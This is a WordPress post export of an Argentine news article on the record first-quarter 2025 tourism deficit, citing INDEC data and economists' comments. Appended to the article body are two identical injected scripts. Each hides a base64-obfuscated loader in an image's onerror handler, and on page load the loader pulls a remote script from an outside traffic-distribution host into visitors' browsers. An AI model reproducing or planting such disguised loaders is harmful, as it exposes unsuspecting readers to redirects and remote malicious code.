{"id":5189,"date":"2025-05-27T16:09:32","date_gmt":"2025-05-27T19:09:32","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5189"},"modified":"2025-08-13T23:32:29","modified_gmt":"2025-08-14T02:32:29","slug":"argentina-cara-en-dolares-la-balanza-turistica-marco-el-deficit-mas-alto-de-la-historia-en-el-primer-cuatrimestre","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5189","title":{"rendered":"Argentina cara en d\u00f3lares: la balanza tur\u00edstica marc\u00f3 el d\u00e9ficit m\u00e1s alto de la historia en el primer cuatrimestre"},"content":{"rendered":"\n<p><strong><em>En abril se volvi\u00f3 a registrar un saldo negativo significativo en la<a href=\"https:\/\/www.perfil.com\/noticias\/economia\/el-superavit-comercial-se-desplomo-en-abril-por-el-aumento-de-las-importaciones.phtml\" target=\"_blank\" rel=\"noreferrer noopener\">\u00a0balanza de turismo internacional.<\/a>\u00a0En el cuarto mes de 2025 ingresaron 699,3 mil visitantes no residentes, mientras que\u00a0salieron 1.425,6 mil residentes,\u00a0resultando en un saldo negativo de 726,3 mil visitantes, de acuerdo con un informe del INDEC.\u00a0<\/em><\/strong><\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><img decoding=\"async\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2025\/05\/mapa-politico-y-administrativo-de-argentina-small-712x1024.jpg\" alt=\"\" class=\"wp-image-18090\" style=\"width:332px;height:auto\"\/><\/figure><\/div>\n\n\n<p>El acumulado del primer cuatrimestre muestra una salida de&nbsp;<strong>5,957 millones de personas&nbsp;<\/strong>y el ingreso de&nbsp;2,065 millones de visitantes desde el exterior.<\/p>\n\n\n\n<p>De esta manera, el&nbsp;<a href=\"https:\/\/www.perfil.com\/noticias\/economia\/el-turismo-dejo-de-impulsar-la-economia-y-ahora-la-arrastra.phtml\" target=\"_blank\" rel=\"noreferrer noopener\">turismo emisivo<\/a>&nbsp;(salida de residentes) viene superando al receptivo (ingreso de extranjeros) desde noviembre de 2024.<\/p>\n\n\n\n<p>En abril ingresaron<strong>&nbsp;699,3 mil visitantes no residentes<\/strong>, que marcaron una disminuci\u00f3n interanual del 8,3%, mientras que Turistas no residentes alcanzaron los 418,8 mil, con una ca\u00edda del 4,8%.<\/p>\n\n\n\n<p>Los principales pa\u00edses de origen fueron Uruguay (18,7%), Brasil (18,5%) y Europa (15%).<\/p>\n\n\n\n<p>Por su parte, salieron&nbsp;<strong>1.425,6 mil visitantes, con un aumento interanual del 30,5%,<\/strong>&nbsp;mientras que los turistas fueron 881,2 mil, con un incremento del 24%. Los destinos preferidos fueron&nbsp;<a href=\"https:\/\/weekend.perfil.com\/noticias\/turismo\/las-islas-cercanas-a-salvador-de-bahia-son-tan-atractivas-como-la-ciudad.phtml\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Brasil (26,8%)<\/strong><\/a>, Chile (24,6%) y Paraguay (11,5%).<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/img-s-msn-com.akamaized.net\/tenant\/amp\/entityid\/AA1Fwuol.img?w=768&amp;h=431&amp;m=6\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u201cEn el primer cuatrimestre del a\u00f1o, casi&nbsp;<strong>6 millones de personas viajaron al exterior,<\/strong>&nbsp;una cifra hist\u00f3rica, mientras que solo ingresaron al pa\u00eds 2 millones de turistas, el n\u00famero m\u00e1s bajo de la \u00faltima d\u00e9cada si se excluyen los a\u00f1os de pandemia. El saldo fue un d\u00e9ficit cercano a los 4 millones de personas, el m\u00e1s alto desde que se tiene registro\u201d, se\u00f1al\u00f3 Daniel Schteingart, director de Fundar.&nbsp;&nbsp;<\/p>\n\n\n\n<p>\u201c\u00bfPor qu\u00e9 un d\u00e9ficit tan grande?&nbsp;<strong>Porque Argentina est\u00e1 muy cara en d\u00f3lares.<\/strong>&nbsp;En otros momentos de la historia, cuando hubo grandes d\u00e9ficits tur\u00edsticos (1980-81, los \u201990, 2011-15, 2017-18), la alta demanda de d\u00f3lares no fue sostenible\u201d, agreg\u00f3 Schteingart.&nbsp;&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/img-s-msn-com.akamaized.net\/tenant\/amp\/entityid\/AA1FwyW2.img?w=768&amp;h=431&amp;m=6\" alt=\"\"\/><\/figure>\n\n\n\n<p><strong>Reservas internacionales<\/strong><\/p>\n\n\n\n<p>Desde el CEPEC consideran que el d\u00e9ficit de la balanza tur\u00edstica&nbsp;<strong>\u201cgenera presi\u00f3n sobre las reservas internacionales<\/strong>&nbsp;(por la mayor demanda de d\u00f3lares para turismo) y afecta a sectores vinculados al turismo receptivo\u201d.&nbsp;<\/p>\n\n\n\n<p>Y a\u00f1aden que la sostenida diferencia entre salidas e ingresos<strong>&nbsp;\u201crefleja tanto la p\u00e9rdida de competitividad del pa\u00eds como destino tur\u00edstico<\/strong>&nbsp;como el mayor poder adquisitivo relativo para viajar al exterior, especialmente a destinos lim\u00edtrofes. Esta tendencia, de mantenerse, podr\u00eda profundizar los desaf\u00edos en la balanza de pagos\u201d.<\/p>\n\n\n\n<p>LM<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_26-5-2025_195529_www.msn_.com_.jpeg\" alt=\"\" class=\"wp-image-18088\"\/><figcaption class=\"wp-element-caption\">Fuente:<\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En abril se volvi\u00f3 a registrar un saldo negativo significativo en la\u00a0balanza de turismo internacional.\u00a0En el cuarto mes de 2025 ingresaron 699,3 mil visitantes no residentes, mientras que\u00a0salieron 1.425,6 mil residentes,\u00a0resultando en un saldo negativo de 726,3 mil visitantes, de acuerdo con un informe del INDEC.\u00a0 El acumulado del primer cuatrimestre muestra una salida de&nbsp;5,957 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5190,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[21],"tags":[],"class_list":{"0":"post-5189","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5189"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5189"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5189\/revisions"}],"predecessor-version":[{"id":6483,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5189\/revisions\/6483"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5190"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5189"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5189"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5189"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}